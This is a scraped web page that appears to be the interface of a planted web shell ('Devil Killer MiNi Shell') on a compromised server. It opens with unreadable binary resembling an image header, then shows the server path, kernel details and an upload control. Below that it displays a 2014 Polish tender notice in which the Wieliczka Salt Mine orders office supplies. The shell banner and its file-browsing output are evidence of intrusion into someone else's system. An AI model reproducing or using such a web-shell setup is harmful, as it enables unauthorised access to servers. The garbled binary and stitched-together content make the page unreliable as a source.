JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140319/92728-N-2014.html

<p class="kh_header"><b>Wieliczka: Dostawa materiałów biurowych</b><br>
<b>Numer ogłoszenia: 92728 - 2014; data zamieszczenia: 19.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kopalnia Soli "Wieliczka" Spółka Akcyjna , Park Kingi 1, 32-020 Wieliczka, woj. małopolskie, tel. 12 278711, 012 2787132, faks 02 2787110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopalniawieliczka.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna - Górnictwo.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia. Prawo opcji.
1.1.	Przedmiotem zamówienia jest sprzedaż wraz z dostarczeniem materiałów biurowych, których rodzaj oraz maksymalne ilości zostały określone w tabeli w pkt 1.2.
1.2.	Szczegółowe zestawienie materiałów biurowych, których dostarczenie stanowi przedmiot niniejszego zamówienia oraz ich ilości i parametry, zawarte poniżej
Lp - Nazwa	- Opis - Maksymalna ilość - J.m.
1) Papier ksero A4- papier do urządzeń biurowych - drukarek atramentowych i laserowych, kserokopiarek oraz faksów, do drukowania czarno-białego i w kolorze, kopiowanie czarno-białe 1 i 2 stronne, gramatura papieru 80g/m2, format A4, bezdrzewny, bezpyłowy, bezchlorowy, w kolorze białym - 166 wg skali CIE - 4000 ryza
/1 ryza - 500 arkuszy/,
2) Papier ksero A3 - papier do urządzeń biurowych - drukarek atramentowych, laserowych, kserokopiarek, do druku czarno-białego i w kolorze, kopiowanie czarno-białe 1 i 2 stronne, gramatura 80g/m2, format A3, bezdrzewny, bezpyłowy, bezchlorowy, w kolorze białym - 166 wg skali CIE - 80 ryza /1 ryza - 500 arkuszy/,
3) Papier A 0 - papier do maszyn wielkoformatowych, kopiujący, druk czarno-biały i w kolorze, wym. w rolkach o szer. 841mm, format A0, gramatura 75/80g/m2, bezdrzewny, bezpyłowy, bezchlorowy, w kolorze białym, dł. 175mb - 10 rolki,
4) Blok z makulatury A4 - blok z miękką okładką, w kratkę, papier biały, gramatura 60g/m2, klejony na górze, 100 kartkowy - 100 szt.
5) Blok z makulatury A5	- blok z miękką okładką, w kratkę, papier biały, gramatura 60g/m2, klejony na górze, 100 kartkowy - 100 szt.
6) Blok z makulatury A6	- blok z miękką okładką, w kratkę, papier biały, gramatura 60g/m2, klejony na górze, 50 kartkowy - 50	szt.
7) Cienkopis - cienkopis o grubości końcówki 0,4mm, końcówka oprawiona w metal, zabezpieczenie przeciw wysychaniu tuszu, kolory: czarny, czerwony, zielony, niebieski -1 000 szt.
8) Cienkopisy w kompletach po 6szt. - cienkopis typu Stabilo Point 88 Fine 0,4 lub równoważny*, z końcówką oprawioną w metal,  o grubości 0,4mm, tusz na bazie wody, wentylowana skuwka zapobiegająca wysychaniu, kolory: niebieski, czarny, czerwony, zielony, fioletowy, różowy - 150	kpl.
9) Cienkopis kulkowy - cienkopis typu PILOT G-TEC C4 lub równoważny*, z wymiennym wkładem żelowym, linia pisania 0,4 mm, długość linii minimum 800 metrów, z tuszem polimerowym nie rozlewającym się przy pisaniu, kolory wkładów: czarny, niebieski, czerwony, zielony	 - 500 szt.
10) Długopis żelowy - długopis o grubości końcówki 0,4mm-0,6 mm z wymiennym wkładem, nie rozlewające się podczas pisania, nie wysychające, w 4-ech kolorach: czarny, czerwony, zielony, niebieski	- 500	szt.
11) Długopis - długopis typu PILOT BL-G2 lub równoważny*, z wymiennym wkładem o grubości pisania 0,32mm, długość linii pisania min. 1200m, z mechanizmem chowania wkładu, zabezpieczeniem przed poplamieniem ubrania - 600 szt.
12) Długopis - długopis typu Pentel BK 77 SUPER B lub równoważny*, z wymiennym wkładem o grubości 0,7mm, długość linii pisania min. 1700m, skuwka zabezpieczająca przed wysychaniem - 600 szt.
13) Długopis - długopis typu Zenith lub równoważny*, z wymiennym wkładem metalowym o grubości 1,0mm, długość linii pisania min. 1000m, obudowa z wytrzymałego tworzywa, z mechanizmem chowania wkładu - 80 szt.
14) Dziurkacz - możliwość dziurkowania jednorazowo 30 kartek, na 2 dziurki, metalowa stabilna podstawa z pojemnikiem na odpadki, ograniczniki formatu - 50 szt.
15) Dziurkacz - możliwość dziurkowania jednorazowo 60 kartek, na 2 dziurki, metalowa stabilna podstawa z pojemnikiem na odpadki, ograniczniki formatu - 20 szt.
16) Etykiety samoprzylepne - do drukarek laserowych, format A4, ilość etykiet na arkuszu -1, tylna kartka zabezpieczająca etykietę dzielona, w opakowaniu 100szt - 40 opak.
17) Folia do laminowania - format A3, przejrzysta, z połyskiem, grubość folii 2x100mic, w opakowaniu 100szt. -10 opak.
18) Folia do laminowania - format A4, przejrzysta, z połyskiem, grubość folii 2x125mic, w opakowaniu 100szt. - 50 opak.
19) Folia do laminowania - format A6, przejrzysta, z połyskiem, grubość folii 2x125mic, w opakowaniu 100szt. - 10 opak.
20) Folia do drukarki - bezbarwna folia A4 do drukarek kolorowych atramentowych, laserowych, grubość 100 mikronów, w opakowaniu 100 szt. -40 opak.
21) Gąbka do tablic - gąbka do tablic suchościeralnych, posiadająca warstwę magnetyczną umożliwiającą przytwierdzenie jej do tablic - 20 szt.
22) Grafit do ołówka automatycznego - HB 0,5mm, odporny na uciskanie, grubość 0,5mm - 50 opak.
23) Grzbiety do bindowania - do zastosowania przy dokumentach formatu A4, różne grubości: 10; 12; 16; 20; 25; 50 /po 10 opakowań każdego rozmiaru/, 
w opakowaniu po 100 szt. - 60 opak.
24) Listwy zaciskowe - do zastosowania przy dokumentach formatu A4, różne grubości: 3; 6; 9; 12 /po 10 opakowań każdego rozmiaru/ w opakowaniu po 100 szt. - 40 opak.
25) Gumka do mazania - do mazania ołówka, nie pozostawiająca śladów	- 50 szt.
26) Kalka maszynowa, ołówkowa - format A4, kolor czarny po 50 szt. w opakowaniu	 - 10 opak.
27) Karteczki - bloczki samoprzylepne - kolorowe karteczki samoprzylepne, wymiar 76x76mm, w bloczku 300 szt. -500 bl.
28) Karteczki - wkład do kubika - klejone z 1 strony, kolorowe, wymiar 85x85mm, w bloczku 400 szt. - 100 bl.
29) Karteczki - wkład do kubika - nie klejone, kolorowe, wymiar 85x85mm, w bloczku 400 szt. - 100 bl.
30) Klej - klej biurowy w sztyfcie, nietoksyczny, o pojemności 20g -100	szt.
31) Kołonotatnik - format A4, w kratkę, okładka półtwarda, posiadający mikroperforację, z możliwością wpięcia do segregatora - 4 otwory, 100 kartek	- 100 szt.
32) Kołonotatnik - format A5, w kratkę, okładka półtwarda, posiadający mikroperforację, z możliwością wpięcia do segregatora - 4 otwory, 100 kartek	- 100 szt.
33) Koperta C6 - szara koperta /na wypłatę/, klejona na mokro na jednym krótkim boku, bez okienka -	10 000 szt.
34) Koperta B4 - koperta biała, samoklejąca na krótkim boku, bez okienka - 1 000 szt.
35) Koperta B5 - koperta biała, samoklejąca na krótkim boku, bez okienka - 1 500 szt.
36) Koperta C4 - koperta biała, samoklejąca na krótkim boku, bez okienka - 2 500 szt.
37) Koperta C5 - koperta biała, samoklejąca, klejona na krótkim boku, bez okienka - 3 000 szt.
38) Koperta listowa C6 - koperta biała, samoklejąca na dłuższym boku, bez okienka - 10 000 szt.
39) Koperty na CD - koperty białe, z okienkiem -1 000	 szt.
40) Koperty bezpieczne - koperty bezpieczne - tajne, samoklejące, wykonane z folii PE, z czarnym poddrukiem i zamknięciem samoklejącym, które uwidacznia próby otwarcia, rozmiar kopert 185 x 255mm - 5 000 szt.
41) Korektor w piórze - szybkoschnący, z metalową końcówką zapewniającą precyzyjność korygowania, pojemność 10ml, nietoksyczny - 200 szt.
42) Korektor w taśmie -	typu PRITT ROLLER lub równoważny*, szerokość taśmy 4,2 mm, długość taśmy 8,5 mb, nietoksyczny, niewidoczny na fotokopii - 150 szt.
43) Korektor w taśmie - typu PRITT ROLLER lub równoważny*, szerokość taśmy 8,4 mm, długość taśmy 14mb mb, nietoksyczny, niewidoczny na fotokopii - 100 szt.
44) Koszulka na dokumenty - krystaliczna folia, grubość do 50 mikronów, o dużej przejrzystości, format A4, możliwość wpięcia do  segregatora, otwierana od góry, 
opakowanie a-100 szt. - 100 opak.
45) Koszulka na dokumenty -/groszek/ format A4, przeźroczysta, wykonana z folii o grubości do 80 mikronów, możliwość wpięcia do segregatora, otwierana od góry, opakowanie a-100 szt. - 500 opak.
46) Koszulka na dokumenty - format A5, przeźroczysta, wykonana z folii o grubości do 80 mikronów, możliwość wpięcia do segregatora, otwierana od góry, 
opakowanie a-100 szt. - 50 opak.
47) Koszulki na dokumenty - z klapką 100mic., wzmocnione brzegi, przeźroczysta, boczna klapka zabezpieczająca dokumenty przed wypadnięciem, multiperforowana, pasująca do każdego segregatora, mieszcząca do 50 kartek formatu A4 o gramaturze 80g/m2, w opakowaniu 10 szt. - 300 opak.
48) Kreda biała - kreda do tablicy (20szt. w opakowaniu) - 30 opak.
49) Linijka z przeźroczystego tworzywa o długości: 20cm i 30cm - 30 szt.
50) Notes - format A6, kartki białe w kratkę, twarda oprawa, szyty, 96 kartek	- 100	szt.
51) Nożyczki - wielkość około 25cm, do ogólnego zastosowania, uchwyty wzmocnione - 50 szt.
52) Ofertówka - format A4, otwierane z boku i od góry, sztywna przeźroczysta folia, grubości 200 mikronów, opakowanie a-25 szt. - 50 opak.
53) Ofertówka - folia PVC, przód i tył twardy, przeźroczysty, format A4, możliwość wpięcia do segregatora, typ L otwierane z boku  i od góry, zaokrąglony górny prawy róg - 100 szt.
54) Okładka do oprawiania dokumentów /ostatnia strona/ - format A4, okładka kartonowa, jednostronnie powlekana, o grubości 230g/m2, w różnych kolorach, twarda, opakowanie a-100 szt. - 25 opak.
55) Okładka do oprawiania dokumentów /pierwsza strona/ - format A4, okładka PCV, przeźroczysta 0,20 mm, opakowanie a-100szt.	 - 255 opak.
56) Ołówek - ołówek drewniany, HB, odporność grafitu na złamania podczas upadku - 150	szt.
57) Ołówek automatyczny - ołówek 0,5mm, trwała obudowa, z gumowym uchwytem, metalowa końcówka z gumką odporna na upadek - 100 szt.
58) Pianka do czyszczenia obudowy komputera - pianka do czyszczenia obudowy plastikowej komputera, antystatyczna, w pojemnikach o pojemności 400 ml - 50	szt.
59) Płyn do czyszczenia ekranów - płyn do czyszczenia powierzchni szklanych monitorów komp., ekranów komp. przenośnych, antystatyczny, w pojemniku o pojemności 250 ml - 50	szt.
60) Ściereczki czyszczące sprzęt komputerowy	ściereczki nasączone preparatem antystatycznym, czyszczące powierzchnie plastikowe, metalowe i laminowane, pojemnik zawierający min.100 szt. - 50 szt.
61) Sprężone powietrze	- przeznaczone do czyszczenia z kurzu miejsc trudnodostępnych w klawiaturach, komputerach, posiadająca wydłużenie dyszy, w pojemnikach 
o pojemności 400 ml - 50 szt.
62) Pinezki	metalowe, w opakowaniu 50 szt. - 50 opak.
63) Pióro kulkowe	typu PARKER lub równoważny*, obudowa plastikowa ze skuwką z metalowym wykończeniem, odporna na upadek, w etui plastikowym, pióro na wkłady wymienne - kulkowe - 50 szt.
64) Marker szybkoschnący - marker typu Edding lub równoważny*, szybkoschnący, piszący po każdej powierzchni, wodoodporny, odporny na ścieranie, z funkcją zapobiegającą wysychaniu końcówki, grubość linii pisania około 1,2mm, czarny - 350 szt.
65) Marker szybkoschnący - marker typu Edding 791 lub równoważny*, szybkoschnący, piszący po każdej powierzchni, wodoodporny, odporny na ścieranie, z funkcją zapobiegającą wysychaniu końcówki, grubość linii pisania około 1,2mm, biały - 100 szt.
66) Pisak do pisania po folii PCV, powierzchniach poliestrowych, wyposażony w gumkę do ścierania, kolor czarny, końcówka o grubości 0,4mm i 0,6 mm - 30	szt.
67) Markery do tablic - komplet kolorowych markerów do tablic suchościeralnych, z gąbką, nie rysujący powierzchni tablicy, końcówka okrągła o grubości 4,0mm, w 4 kolorach - 30 kpl.
68) Pisak do płyt CD - pisak do opisywania płyt CD, wyposażony w końcówkę miękką o średnicy 1,0mm, szybkoschnący i niezmywalny tusz o neutralnym zapachu, kolor czarny - 100 szt.
69) Marker lakierowy typu Edding 750 lub równoważny*, z tuszem bez dodatku toluenu i ksylenu, wyposażony w system kontroli dopływu tuszu do końcówki, mający zastosowanie na  każdej powierzchni, grubość linii pisania około 2-4mm, kolor biały i czarny - 350 szt.
70) Pisaki w komp. po 6 szt. - pisaki kolorowe, nietoksyczne, uniwersalne, odporne na wysychanie - 50 kpl.
71) Płyta CD-RW 700MB - 2 000 szt.
72) Płyta DVD pojemność 8,5 GB, podwójna struktura, kompatybilna z wszystkimi odtwarzaczami DVD - 1 000 szt.
73) Podajnik na taśmę klejącą biurową z ostrzem do ucinania taśmy klejącej, stabilny, wytrzymały na pęknięcia do ustawienia na biurku - 20 szt.
74) Pojemnik na karteczki kolorowe - kostka pojemnik plastikowy na biurko, trwały - 20 szt.
75) Pojemnik na spinacze z tworzywa przeźroczystego, z magnesem, trwały, na biurko, o pojemności min. 100 spinaczy - 20 szt.
76) Przybornik na biurko	plastikowy, zawierający miejsce na kartki, długopisy, spinacze itp. wymiar: dł. 105 x szer.155 x wys. 102 mm - 20	szt.
77) Przekładki do segregatora	- format A4, kartonowe, numeryczne (1-10) i alfabetyczne, specjalnie wzmocnione kolorowe indeksy, z kartą informacyjno-opisową, pasujące
do każdego segregatora	 - 100 opak.
78) Rozszywacz - rozszywacz do łatwego usuwania zszywek z dokumentów - 50 szt.
79) Segregator - format A4, trwały sztywny, wykonany z kartonu pokrytego polipropylenem, z mechanizmem dźwigniowym, wzmacniane krawędzie, 
z dwustronną opisową etykietą wymienną, szerokość grzbietu 80mm, w różnych kolorach - 400 szt.
80) Segregator - format A4, trwały sztywny, wykonany z kartonu pokrytego polipropylenem, z mechanizmem dźwigniowym, wzmacniane krawędzie, 
z dwustronną opisową etykietą wymienną, szerokość grzbietu 50mm, w różnych kolorach - 300 szt.
81) Segregator - format A5, trwały sztywny, wykonany z kartonu pokrytego polipropylenem, z mechanizmem dźwigniowym, wzmacniane krawędzie, z dwustronną opisową etykietą wymienną, szerokość grzbietu 80mm, w różnych kolorach	- 100 szt.
82) Skoroszyt - format A4, wykonany z PCV z możliwością wpięcia do segregatora, przednia okładka przezroczysta, tylna kolorowa, wysuwany pasek 
do opisu, różne kolory - 4 000 szt.
83) Skoroszyt oczkowy	- format A4, tekturowy, wykonane z kartonu 280g/m2, z możliwością wpięcia do segregatora - 200 szt.
84) Skorowidz - format A4, twarda oprawa, szyty, alfabetyczny, a 96 kartek - 50 szt.
85) Skorowidz - format A5, twarda oprawa, szyty, alfabetyczny, a 96 kartek - 20 szt.
86) Spinacze  metalowe, trwałe, niełamliwe, 28mm, w opakowaniu 100 szt. - 300 opak.
87) Spinacze metalowe, trwałe, niełamliwe, 50mm, w opakowaniu 100szt. - 100 opak.
88) Szuflada na dokumenty - półka na dokumenty formatu A4, trwała, plastikowa, przezroczysta, na biurko z możliwością ustawiania jednej na drugiej, wym. dł. 343 x szer. 253 x wys. 61mm - 50 szt.
89) Taśma do drukarek - rozmiar 6	do drukarek DYMO, taśma biało-czarna, niebiesko-czarna, czerwono-czarna, zielono-czarna, żółto-czarna, biało-niebieska, biało-czerwona - 30 szt.
90) Taśma do drukarek - rozmiar 9	do drukarek DYMO, taśma biało-czarna, niebiesko-czarna, czerwono-czarna, zielono-czarna, żółto-czarna, biało-niebieska, biało-czerwona - 30 szt.
91) Taśma do drukarek - rozmiar 12	do drukarek DYMO, taśma biało-czarna, niebiesko-czarna, zielono-czarna, żółto-czarna, biało-niebieska, biało-czerwona - 50 szt.
92) Taśma do drukarek - rozmiar 19	do drukarek DYMO, taśma biało-czarna, niebiesko-czarna, żółto-czarna, biało-niebieska, biało-czerwona - 50 szt.
93) Taśma do drukarek -  rozmiar 24 do drukarek DYMO, taśma biało-czarna, niebiesko-czarna, żółto-czarna, biało-niebieska, biało-czerwona - 20 szt.
94) Taśma klejąca - taśma biurowa klejąca o szerokości około 19mm, przeźroczysta	200 szt.
95) Teczka do podpisu w twardej, trwałej oprawie, 20 kartek z jednym otworem na środku strony, format A4 - 100 szt.
96) Teczka kopertowa - format A4, z polipropylenu, kolorowa, zamykana  na gumkę, z wewnętrznymi skrzydełkami zabezpieczającymi przed wypadaniem dokumentów - 100 szt.
97) Teczka skrzydłowa - format A4, szerokość grzbietu do 40mm, wykonana z twardej i sztywnej tektury /2mm/ kolorowej, powlekanej folią polipropylenową, zamykana 
na gumkę z wewnętrznymi skrzydełkami zabezpieczającymi przed wypadaniem dokumentów - 100 szt.
98) Teczka z gumką - format A4, tekturowa, kolorowa, z grubej tektury, z wewnętrznymi skrzydełkami zabezpieczającymi przed wypadaniem dokumentów - 1 000	szt.
99) Teczka plastikowa na gumkę - format A4, wykonana z PCV, zapinana na gumkę z wewnętrznymi skrzydełkami zabezpieczającymi przed wypadaniem dokumentów - 500 szt.
100) Teczka wiązana - format A4, tekturowa, biała z wewnętrznymi skrzydełkami zabezpieczającymi przed wypadaniem dokumentów	 - 3 500 szt.
101) Deska z klipem A4	z tworzywa sztucznego w środku z klipem przytrzymującym dokumenty - 20 szt.
102) Tusz do pieczątek	czarny tusz do każdego rodzaju stempli, pojemniki 25 ml. - 50 szt.
103) Wkład do cienkopisu - wkład do cienkopisu typu Pilot G-TEC-C-4, z tuszem polimerowym, grubość końcówki 0,4mm, w kolorach: niebieski, czarny, czerwony, zielony - 150 szt.
104) Wkład do długopisu - wkład do długopisu Parker, metalowy, kolor czarny i niebieski - 100 szt.
105) Wkład do długopisu - wkład do długopisu Pentel BK 77 Super B, grubość końcówki 0,7mm, długość linii pisania 1700m, kolor niebieski - 100 szt.
106) Wkład do długopisu - wkład do długopisu Zenith, metalowy, kolor niebieski i czarny, dł. wkładu 9,5 cm - 100 szt.
107) Wkład do długopisu żelowego - wkład do długopisu żelowego UNI UMN /152; 207/, grubość linii pisania: 0,3 i  0,4mm, z tuszem światło i wodoodpornym, kolory: czerwony, czarny, niebieski, zielony	- 200	szt.
108) Wkład do pióra wiecznego - naboje do pióra wiecznego PARKER, długość wkładu 7,2 cm, kolor: czarny, niebieski - 100 szt.
109) Temperówka	 do ołówków, kredek - 30 szt.
110) Zakładki indeksujące - zakładki kolorowe, z możliwością robienia na nich zapisów, z możliwością wielokrotnego naklejania, łatwo usuwalne, wielkości około 20x50mm, 
w kompletach  po min. 160 szt. - 200 kpl.
111) Zakreślacz pisak - zakreślacz tekstu, fluorescencyjny, grubość linii 2,0 - 4,0 mm, różne kolory, w kompletach po 5szt. - 100 kpl.
112) Zeszyt A4 - 	format A4, szyty, 200 kartek w kratkę, białego koloru, twarda oprawa laminowana, gramatura 60g/m2 - 50 szt.
113) Zeszyt A4 - format A4, w kratkę, o gramaturze 60g/m2, szyty, twarda oprawa laminowana, 96 kartek - 150 szt.
114) Zeszyt A5 - format A5, w kratkę, o gramaturze 60g/m2, szyty, twarda oprawa laminowana, 96 kartek - 150 szt.
115) Zeszyt B5 - format B5, w kratkę, o gramaturze 60g/m2, szyty, twarda oprawa laminowana, 96 kartek - 50 szt.
116) Zszywacz - zszywacz biurowy, możliwość zszywania jednorazowo około 30-40 kartek, trwała obudowa, stabilna metalowa podstawa, antypoślizgowa plastikowa nakładka - 30 szt.
117) Zszywacz - zszywacz biurowy, możliwość zszywania jednorazowo około 120 kartek, trwała obudowa, stabilna metalowa podstawa , antypoślizgowa plastikowa nakładka - 20 szt.
118) Zszywki do zszywacza biurowego wymienionego w poz. 116, w opakowaniu 1000 szt. - 500 opak.
119) Zszywki do zszywacza biurowego wymienionego w poz. 117, w opakowaniu 1000 szt. - 50 opak.
120) Druk delegacji - format A5, 50 szt. w bloczku - 50 bl.
121) Druk OT - przyjęcie środka trwałego, format A5, samokopiujący, 80 szt. w bloczku - 50 bl.
122) Druk zaświadczenie o zatrudnieniu - format A6, 80 szt. w bloczku - 50 bl.
123) Druk zmiana miejsca użytkowania - format A6, samokopiujący, 80 szt. w bloczku - 50 bl.
124) Druk przepustka jednorazowa - format ? A6, 80 szt. w bloczku - 50 bl.
125) Druk polecenie przelewu - format A6 / 1+3/ samokopiujący, 80 szt. w bloczku - 300	bl.
126) Klipy do dokumentów wykonane z metalu, zapewniające sprężystość, do spinania banknotów i dokumentów, w opakowaniach po 12 szt., w rozmiarach: 19; 25; 32; 41 - po 30 opak. - 120 opak.
127) Pudła archiwizacyjne 80 	bezkwasowe, posiadające certyfikat FSC, format A4, rozmiar 350 x 80 x 250 -	50 szt.
128) Pudła archiwizacyjne 100 bezkwasowe, posiadające certyfikat FSC, format A4, rozmiar 350 x 100 x 250 - 100 szt.
129) Pudła archiwizacyjne 150 bezkwasowe, posiadające certyfikat FSC, format A4, rozmiar 350 x 150 x 250 - 300 szt.
* Zamawiający dopuszcza możliwość zaoferowania produktów równoważnych o parametrach nie gorszych od parametrów materiałów biurowych podanych w powyższej tabeli. Jeżeli Wykonawca zaoferuje inny materiał powołując się, iż jest on równoważny przedstawionemu, obowiązany jest wskazać w ofercie ten materiał oraz wykazać, że oferowany materiał spełnia wymagania określone przez Zamawiającego.
1.3. W ramach maksymalnych ilości materiałów biurowych, określonych w tabeli, o której mowa w pkt 1.2, Zamawiający zobowiązuje się do zakupu materiałów biurowych 
o wartości 60% maksymalnej ceny brutto, podanej w ofercie. Zakup pozostałej ilości materiałów biurowych o wartości 40% maksymalnej ceny brutto, podanej w ofercie, zależeć będzie od potrzeb Zamawiającego. Oznacza to że Zamawiający może zrezygnować z zakupu całości lub części materiałów biurowych o wartości 40% maksymalnej ceny brutto (prawo opcji).
2. Warunki dostarczania materiałów biurowych.
2.1. Materiały biurowe dostarczane będą przez Wykonawcę na zlecenie Zamawiającego, sukcesywnie, partiami, w okresie obowiązywania umowy, w rodzaju i w ilościach określonych przez Zamawiającego.
2.2. Zamawiający zlecać będzie dostarczanie przedmiotu umowy nie częściej niż 4 razy w miesiącu, w dni robocze (od poniedziałku do piątku), w godzinach między 7.00 
a 14.00.
2.3. Wykonawca zobowiązany jest dostarczyć materiały biurowe do siedziby Zamawiającego w terminie do 3 dni roboczych, licząc od daty przekazania Wykonawcy zlecenia faksem lub pocztą e-mail. O przekazaniu zlecenia Zamawiający jednocześnie powiadomi Wykonawcę telefonicznie.
2.4. O przygotowaniu zleconej dostawy Wykonawca jest zobowiązany powiadomić Zamawiającego telefonicznie, nie później niż na 1 dzień roboczy przed wymaganym terminem dostawy.
2.5. Do każdej dostawy winna być załączona faktura VAT.
2.6. Dostarczanie materiałów biurowych odbywać się będzie na koszt Wykonawcy.
Szczegółowe informacje dotyczące przedmiotu zamówienia i zasad jego realizacji zawarte zostały we wzorze umowy stanowiącym załącznik nr 6 do SIWZ, zamieszczonej na stronie internetowej Zamawiającego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
